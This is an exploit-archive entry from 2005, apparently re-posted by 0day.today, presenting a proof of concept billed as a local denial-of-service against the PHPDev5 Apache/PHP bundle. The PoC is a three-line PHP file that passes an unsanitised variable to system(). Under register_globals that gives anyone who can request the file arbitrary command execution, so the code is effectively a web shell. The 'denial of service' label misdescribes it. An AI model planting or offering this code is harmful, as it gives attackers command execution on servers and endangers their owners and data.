id: 5966
date: 03/17/2005
title: phpDEV5 System-Call Local Denial of Service Exploit
author: Ali7
cves: 

===================================================
phpDEV5 System-Call Local Denial of Service Exploit
===================================================


------------------------------------------------------------------------
# PHPDev5 <== Apache Server Local Denial-of-Service PoC
# By : Ali7
# e-mail : ali7@hotmail.co.uk
# date : 16-03-2k5
# greetz : our group :P
 

>Target : PHPDev 5
>URL : www.firepages.com.au - http://sourceforge.net/projects/phpdev5/
>Type : PHP/Apache/MySQL Server..
..
 
>>PoC Sample :
 
Save this code as .php or .php3 file..
 
//start
 
<?

system($Ali7);

?>
 
//end



#  0day.today [2023-03-22]  #